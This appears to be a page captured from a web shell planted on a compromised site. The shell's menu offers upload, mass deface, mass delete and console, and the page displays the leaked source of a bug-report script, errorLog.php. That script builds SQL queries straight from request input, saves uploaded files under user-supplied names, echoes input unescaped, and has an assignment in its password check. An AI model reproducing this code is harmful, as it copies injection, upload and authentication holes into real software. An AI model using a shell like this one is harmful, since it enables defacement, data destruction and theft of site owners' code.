shell bypass 403
UnknownSec Shell
:
/
home
/
delvin
/
stage.delv-in.com
/ [
drwxr-x---
]
upload
mass deface
mass delete
console
info server
name :
errorLog.php
<?php include("adminPages/validate.php"); $pageTitle = "Website Errors/Bugs"; date_default_timezone_set('America/Los_Angles'); include ("topInclude.php"); $submitBut = $_POST['submitBut']; $step = $_POST['step']; $action = $_GET['action']; $nowTS = strtotime("now"); $today = date("M j, Y"); $todayNum = date("j"); $urgencyArr = array("4" => "no rush", "3" => "2 weeks", "2" => "1 week","1" => "ASAP"); $urgColArr = array("4"=>"green", "3"=>"yellow", "2"=>"orange", "1"=>"red"); $rowBorder = "border-bottom: solid 1px #036; padding: 0px 6px 0px 6px;"; //======================================================= $pageTitle = "| Error Log"; //==== follows NSEA Admin Tools print "<p class='pageTitle'>Report Errors/Bugs</p>"; //print "step=$step | submitBut=$submitBut | $todayNum | ".date('n')." | m=$m | PID=$PID | LID=$LID | LIstatus = $LIstatus<br />"; if ((($userC != '' and $passC != '' and $userC==$validUser and $passC=$encryptPass) or ($validUser == $uname and $userID == $LID )) and ($PID != '' and $LID != '') or $LIstatus == 'superUser'){ if ($LIstatus == 'superUser'){ //------------ CREATE ALL USERS ARRAY ------ $query = "SELECT * FROM users WHERE userID > 0 and"; $query1 = "SELECT * FROM errorLog"; $result1 = mysql_query($query1, $connect); while ($row1 = mysql_fetch_row($result1)){ $userID = $row1[3]; $query .= " userID = '$userID' or"; } $query = substr($query,0,-3); //print __LINE__.": $query<br />"; $result = mysql_query($query, $connect); $usersArr = array(); while ($row = mysql_fetch_row($result)){ $userID = $row[0]; $fName = $row[2]; $lName = $row[4]; $usersArr[$userID] = "$lName, $fName"; } //============= END CREATE ALL USERS ARRAY ========== if ($submitBut != 'Log an Error/Bug' and $submitBut != 'Mod' and $submitBut != 'Del' and $submitBut != 'View Details'){ if ($submitBut == 'Save Changes' or $submitBut == 'Add Report to Log'){ $URL = $_POST['URL']; $descript = $_POST["descript"]; $screenShot = $_FILES['screenShot']['name']; $urgency = $_POST['urgency']; if ($submitBut == 'Add Report to Log'){ $query = "INSERT INTO errorLog VALUES ('NULL', '$nowTS', '$PID', '$LID', '$URL', \"$descript\", '$screenShot', '$urgency', '')"; $subject = "Add Error or Bug was logged"; $message = "A new log entry was made: $descript"; } else if ($submitBut == 'Save Changes'){ $errorLogID = $_POST['errorLogID']; $delScreenShot = $_POST['delScreenShot']; $userID = $_POST['userID']; $query = "UPDATE errorLog SET URL='$URL', descript=\"$descript\", "; if ($screenShot != ''){ $query .= "screenShot='$screenShot', "; } else if ($delScreenShot == 'on'){ $query .= "screenShot = '', "; } $query .= "urgency='$urgency' WHERE errorLogID='$errorLogID'"; $subject = "An Error or Bug log $errorLogID was updated"; $message = "A change has been made to log # $errorLogID: $descript"; } //print __LINE__.": $query<br />"; if (mysql_query($query, $connect)){ if ($errorLogID == ''){ $query = "SELECT * FROM errorLog WHERE userID='$LID' and URL='$URL' and addedTS = '$nowTS'"; $result = mysql_query($query, $connect); //print __LINE__.": $query<br />"; $row = mysql_fetch_row($result); $errorLogID = $row[0]; print "<p>Error/bug report has been recorded and has been assigned Error Log # $errorLogID.</p>"; } else { print "<p>Error/bug report # $errorLogID has been updated.</p>"; } if ($screenShot != ''){ // UPLOAD THE SCREENSHOT FILE $uploaddir = "screenShots/"; $uploadfile = $uploaddir . $screenShot; if (move_uploaded_file($_FILES['screenShot']['tmp_name'], $uploadfile)) { print "<p>The screenshot was uploaded.</p>"; } else { print "<p>An error prevented the screenshot from being uploaded. You can email your screenshot to <a href='mailto:techsupport@delve-bl.com'>techsupport@delve-bl.com</a>. Please reference <b>Error Report # $errorLogID</b></p>"; } } if ($userID != $LID){ mail('techsupport@delve-bl.com',"$subject", "$message", "From: info@delve-bl.com"); } } else { print "<p><b>*** DATABASE WRITE ERROR ***</b></p> <p>The error report was not submitted. Please try again or <a href='mailto:techsupport@delve-bl.com'>contact DELVE tech support</a>.</p>"; } } else if ($submitBut == 'Delete Error Log Entry'){ $errorLogID = $_POST['errorLogID']; $query = "DELETE FROM errorLog WHERE errorLogID = '$errorLogID'"; mysql_query($query, $connect); } else if ($submitBut == 'updateFixed') { $errorLogID = $_POST['errorLogID']; $fixed = $_POST['fixed']; if ($fixed == 'on'){ $fixedTS = $nowTS; } else { $fixedTS = ''; } $query = "UPDATE errorLog SET fixedTS = '$fixedTS' WHERE errorLogID='$errorLogID'"; mysql_query($query, $connect); } //================== DISPLAY ALL ERROR LOGS ======================= //-----------------------FORM TO FILTER DISPLAY ----------------------- $showResolved = $_POST['showResolved']; $fUrg = $_POST['fUrg']; $fDescript = $_POST['fDescript']; $fUsers = $_POST['fUsers']; print "<form action='errorLog.php' method='post' style='display:inline-block; position:relative; vertical-align:top;'> <table style='border:solid 2px #036; border-radius:10px; padding:10px; background-color: #efefef;'> <tr><td colspan=4 style='font-size:18px; font-weight:bold; color:#036'>Filter Display Results by:</td></tr> <tr style='vertical-align:bottom'><td>Urgency<br> <select name='fUrg'><option value=''>--all--</option>"; foreach ($urgencyArr as $key => $value){ print "<option value='$key' style='background-color:$urgColArr[$key];'"; if ($fUrg == $key){ print " selected"; } print ">$value</option>"; } print "</select></td><td>Description contains<br> <input type='text' name='fDescript' size=30 maxlength=30 value='$fDescript'></td> <td>Submitted by<br> <select name='fUsers'><option value=''>--all--</option>"; foreach($usersArr as $key => $value){ print "<option value='$key'"; if ($key == $fUsers){ print " selected"; } print ">$value</option>"; } print "</select></td><td><input type='submit' name='submitBut' value='Refresh Display'></td> </tr></table></form> <form action='errorLog.php' method='post' style='display:inline-block; position:relative; margin: 0px 0px 0px 50px; vertical-align:top;'> <input type='submit' name='submitBut' value='Log an Error/Bug' style='font-size:14px; color:#036; font-weight:bold;'></form> <form action='errorLog.php' method='post'><input type='checkbox' name='showResolved' onclick='submit(this.form)'"; if ($showResolved == 'on'){ print " checked"; } print ">Display resolved log entries</form> <table cellspacing=0><tr style='background-color:#036;'><th style='color:#fff; padding:0px 6px 0px 6px;'>Log #</th><th style='color:#fff; padding:0px 6px 0px 6px;'>Date Submitted</th><th style='color:#fff; padding:0px 6px 0px 6px;'>Urgency</th><th style='color:#fff; padding:0px 6px 0px 6px;'>Submitted by</th><th style='color:#fff; padding:0px 6px 0px 6px;'>Action</th><th style='color:#fff; padding:0px 6px 0px 6px;'>Description</th><th style='color:#fff; padding:0px 6px 0px 6px;'>Screenshot</th><th style='color:#fff; padding:0px 6px 0px 6px;'>Resolved</th></tr>"; $query = "SELECT * FROM errorLog WHERE errorLogID > '0' and"; if ($showResolved == 'on'){ $query .= " fixedTS > '0' and"; } else { $query .= " fixedTS <= '' and"; } if ($fUrg != ''){ $query .= " urgency = '$fUrg' and"; } if ($fDescript != ''){ $query .= " descript LIKE \"%$fDescript%\" and "; } if ($fUsers != ''){ $query .= " userID = '$fUsers' and"; } $query = substr($query,0,-4); $query .= " ORDER BY addedTS DESC"; //print __LINE__.": $query<br />"; $result = mysql_query($query, $connect); while ($row = mysql_fetch_row($result)){ $errorLogID = $row[0]; $addedTS = $row[1]; $added = date("H:i M/j/y", $addedTS); $practiceID = $row[2]; $userID = $row[3]; $URL = $row[4]; $descript = substr($row[5],0,75)."..."; $screenShot = $row[6]; $urgency = $row[7]; $fixedTS = $row[8]; if ($fixedTS > 0){ $fixed = date("H:i M/j/y", $fixedTS); } else { $fixed = ''; } $query2 = "SELECT * FROM users WHERE userID = '$userID' and practiceID='$practiceID'"; $result2 = mysql_query($query2, $connect); $row2 = mysql_fetch_row($result2); $submittedBy = $row2[2]." ".$row2[4]; print "<tr><td style='$rowBorder text-align:center'>$errorLogID</td><td style='$rowBorder '>$added</td> <td style='background-color:$urgColArr[$urgency]; $rowBorder color:#000; font-weight:bold; text-align: center;'>$urgencyArr[$urgency]</td> <td style='$rowBorder '>$submittedBy</td><td style='$rowBorder '> <form action='errorLog.php' method='post'> <input type='hidden' name='errorLogID' value='$errorLogID'> <input type='hidden' name='userID' value='$userID'> <input type='submit' name='submitBut' value='View Details'><input type='submit' name='submitBut' value='Mod'><input type='submit' name='submitBut' value='Del'></form></td><td style='$rowBorder '>$descript</td><td style='$rowBorder '>$screenShot</td> <td style='$rowBorder text-align:center'> <form action='errorLog.php' method='post'> <input type='hidden' name='errorLogID' value='$errorLogID'> <input type='hidden' name='submitBut' value='updateFixed'><input type='checkbox' name='fixed'"; if ($fixedTS > 0){ print " checked"; } print " onclick='submit(this.form)'>$fixed </form></td></tr>"; } print "</table>"; } else if ($submitBut == 'View Details'){ $errorLogID = $_POST['errorLogID']; $query = "SELECT * FROM errorLog WHERE errorLogID = '$errorLogID'"; $result = mysql_query($query, $connect); $row = mysql_fetch_row($result); $addedTS = $row[1]; $added = date("H:i M/j/y", $addedTS); $practiceID = $row[2]; $userID = $row[3]; $URL = $row[4]; $descript = $row[5]; $screenShot = $row[6]; $urgency = $row[7]; $fixedTS = $row[8]; if ($fixedTS > 0){ $fixed = date("H:i M/j/y", $fixedTS); } else { $fixed = ''; } $query2 = "SELECT * FROM users WHERE userID = '$userID' and practiceID='$practiceID'"; $result2 = mysql_query($query2, $connect); $row2 = mysql_fetch_row($result2); $submittedBy = $row2[2]." ".$row2[4]; print "<p><b>Error Log Submitted $added by $submittedBy</b></p> <p>Urgency: $urgencyArr[$urgency]</p> <p>Status: "; if ($fixedTS > 0){ print "Resolved $fixed"; } else { print "Open"; } print "</p> <p>$descript</p>"; if ($screenShot != ''){ print "<img src='screenShots/$screenShot'>"; } print "<form action='errorLog.php' method='post'> <input type='submit' name='submitBut' value='⇐ Back'></form>"; } else if ($submitBut == 'Log an Error/Bug'){ //======== FORM FOR SUPERUSER TO ADD A LOG ENTRY print "<form action='errorLog.php' method='post' enctype='multipart/form-data' style='border-top:solid 1px #000'> <input type='hidden' name='max_file_size' value='3000000'> <p>URL: <input type='text' name='URL' size=80 maxlength=255> <span style='font-size:11px;'>Select and copy the webpage address of the page producing the error from the URL line of your browser, then paste in this text field.</span></p> <p>Please describe what you were doing before the problem occurred and the nature of the problem:<br> <textarea name='descript' rows=10 cols=80></textarea></p> <p>Screenshot: <input type='file' name='screenShot' id='screenShot'> <span style='font-size:11px;'>Optional: if you have a screenshot that illustrates the problem, please upload it*.</span></p> <p>Urgency: <select name='urgency'>"; foreach ($urgencyArr as $key => $value){ print "<option value='$key' style='background-color:$urgColArr[$key];'>$value</option>"; } print "</select></p> <p style='width:700px; text-align:center'><input type='submit' name='submitBut' value='Add Report to Log'><input type='submit' name='submitBut' value='Cancel'> </form> <p>*Windows users should install a screenshot utility such as <a href='http://www.greenshot.org' target='_blank'>Greenshot</a> to easily make and save screenshots</p>"; } else if ($submitBut == 'Mod'){ //=========== FORM FOR SUPERUSER TO MODIFY A LOG ENTRY $errorLogID = $_POST['errorLogID']; $query = "SELECT * FROM errorLog WHERE errorLogID = '$errorLogID'"; $result = mysql_query($query, $connect); $row = mysql_fetch_row($result); $addedTS = $row[1]; $added = date("H:i M/j/y", $addedTS); $practiceID = $row[2]; $userID = $row[3]; $URL = $row[4]; $descript = $row[5]; $xScreenShot = $row[6]; $urgency = $row[7]; $fixedTS = $row[8]; if ($fixedTS > 0){ $fixed = date("H:i M/j/y", $fixedTS); } else { $fixed = ''; } $query2 = "SELECT * FROM users WHERE userID = '$userID' and practiceID='$practiceID'"; $result2 = mysql_query($query2, $connect); $row2 = mysql_fetch_row($result2); $submittedBy = $row2[2]." ".$row2[4]; print "<form action='errorLog.php' method='post' enctype='multipart/form-data' style='border-top:solid 1px #000'> <input type='hidden' name='max_file_size' value='3000000'> <input type='hidden' name='xScreenShot' value='$xScreenShot'> <input type='hidden' name='errorLogID' value='$errorLogID'> <p>Error/Bug Report # $errorLogID</p> <p>Submitted by: <select name='userID'>"; foreach ($usersArr as $key => $value){ print "<option value='$key'"; if ($key == $userID){ print " selected"; } print ">$value</option>"; } print "</select></p> <p>URL: <input type='text' name='URL' size=80 maxlength=255 value='$URL'> <span style='font-size:11px;'>Select and copy the webpage address of the page producing the error from the URL line of your browser, then paste in this text field.</span></p> <p>Please describe what you were doing before the problem occurred and the nature of the problem:<br> <textarea name='descript' rows=10 cols=80>$descript</textarea></p><p>"; if ($xScreenShot != ''){ print "Existing Screenshot: <img src='screenShots/$xScreenShot' width=600 style='vertical-align:top; border: solid 1px #036;'> $xScreenShot </p> <p><input type='checkbox' name='delScreenShot' style='margin-left:30px;'>Delete this screenshot, or replace it with a new one: "; } else { print "Upload a screenshot (optional):"; } print " <input type='file' name='screenShot' id='screenShot'></p> <p>Urgency: <select name='urgency'>"; foreach ($urgencyArr as $key => $value){ print "<option value='$key' style='background-color:$urgColArr[$key];'"; if ($key == $urgency){ print " selected"; } print ">$value</option>"; } print "</select></p> <p style='width:700px; text-align:center'><input type='submit' name='submitBut' value='Save Changes'><input type='submit' name='submitBut' value='Cancel'> </form><p>*Windows users should install a screenshot utility such as <a href='http://www.greenshot.org' target='_blank'>Greenshot</a> to easily make and save screenshots</p>"; } else if ($submitBut == 'Del'){ //=========== FORM FOR SUPERUSER TO CONFIRM DELETE OF A LOG ENTRY $errorLogID = $_POST['errorLogID']; $query = "SELECT * FROM errorLog WHERE errorLogID = '$errorLogID'"; $result = mysql_query($query, $connect); $row = mysql_fetch_row($result); $addedTS = $row[1]; $added = date("H:i M/j/y", $addedTS); $practiceID = $row[2]; $userID = $row[3]; if ($fixedTS > 0){ $fixed = date("H:i M/j/y", $fixedTS); } else { $fixed = ''; } $query2 = "SELECT * FROM users WHERE userID = '$userID' and practiceID='$practiceID'"; $result2 = mysql_query($query2, $connect); $row2 = mysql_fetch_row($result2); $submittedBy = $row2[2]." ".$row2[4]; print "<p>Are you sure you want to delete Error Log # $errorLogID that was added at $added by $submittedBy? This cannot be undone.</p> <form action = 'errorLog.php' method='post'> <input type='hidden' name='errorLogID' value='$errorLogID'> <input type='submit' name='submitBut' value='Delete Error Log Entry'> <input type='submit' name='submitBut' value='Cancel'> </form>"; } } else { if ($submitBut == ''){//==== FORM TO SUBMIT ERROR REPORT FOR NON-SUPER USERS print "<p>While <b>DELVE</b> is in alpha or beta test phase, this page is the portal through which errors and bugs are logged so tech support can troubleshoot and fix. In order to fix bugs and errors it is often necessary for us to replicated the problem, therefore the more information you can provide to help us do that, the faster we can resolve the issue. Thanks for your help.</p> <form action='errorLog.php' method='post' enctype='multipart/form-data' style='border-top:solid 1px #000'> <input type='hidden' name='max_file_size' value='3000000'> <p>URL: <input type='text' name='URL' size=80 maxlength=255> <span style='font-size:11px;'>Select and copy the webpage address of the page producing the error from the URL line of your browser, then paste in this text field.</span></p> <p>Please describe what you were doing before the problem occurred and the nature of the problem:<br> <textarea name='descript' rows=10 cols=80></textarea></p> <p>Screenshot: <input type='file' name='screenShot' id='screenShot'> <span style='font-size:11px;'>Optional: if you have a screenshot that illustrates the problem, please upload it*.</span></p> <p>Urgency: <select name='urgency'>"; foreach ($urgencyArr as $key => $value){ print "<option value='$key' style='background-color:$urgColArr[$key];'>$value</option>"; } print "</select></p> <p style='width:700px; text-align:center'><input type='submit' name='submitBut' value='Submit Error/Bug Report'> </form> <p>*Windows users should install a screenshot utility such as <a href='http://www.greenshot.org' target='_blank'>Greenshot</a> to easily make and save screenshots</p>"; //========= ERROR REPORT SUBMISSION FOR NON-SUPERUSERS ==================== } else if ($submitBut == 'Submit Error/Bug Report'){ $URL = $_POST['URL']; $descript = $_POST["descript"]; $screenShot = $_FILES['screenShot']['name']; $urgency = $_POST['urgency']; $query = "INSERT INTO errorLog VALUES ('NULL', '$nowTS', '$PID', '$LID', '$URL', \"$descript\", '$screenShot', '$urgency', '')"; if (mysql_query($query, $connect)){ $query = "SELECT * FROM errorLog WHERE userID='$LID' and URL='$URL' and nowTS = '$nowTS'"; $result = mysql_query($query, $connect); $row = mysql_fetch_row($result); $errorLogID = $row[0]; print "<p>Your error/bug report has been recorded and has been assigned Error Log # $errorLogID.</p><p>Thanks for submitting.</p>"; if ($screenShot != ''){ // UPLOAD THE SCREENSHOT FILE $uploaddir = "screenShots/"; $uploadfile = $uploaddir . $screenShot; if (move_uploaded_file($_FILES['screenShot']['tmp_name'], $uploadfile)) { print "<p>The screenshot was uploaded.</p>"; } else { print "<p>An error prevented the screenshot from being uploaded. You can email your screenshot to <a href='mailto:techsupport@delve-bl.com'>techsupport@delve-bl.com</a>. Please reference <b>Error Report # $errorLogID</b></p>"; } } } else { print "<p><b>*** DATABASE WRITE ERROR ***</b></p> <p>The error report was not submitted. Please try again or <a href='mailto:techsupport@delve-bl.com'>contact DELVE tech support</a>.</p>"; } } } } else if ($validLogin == FALSE){ include("loginForm.php"); } include ("bottomInclude.php"); ?>
© 2026 UnknownSec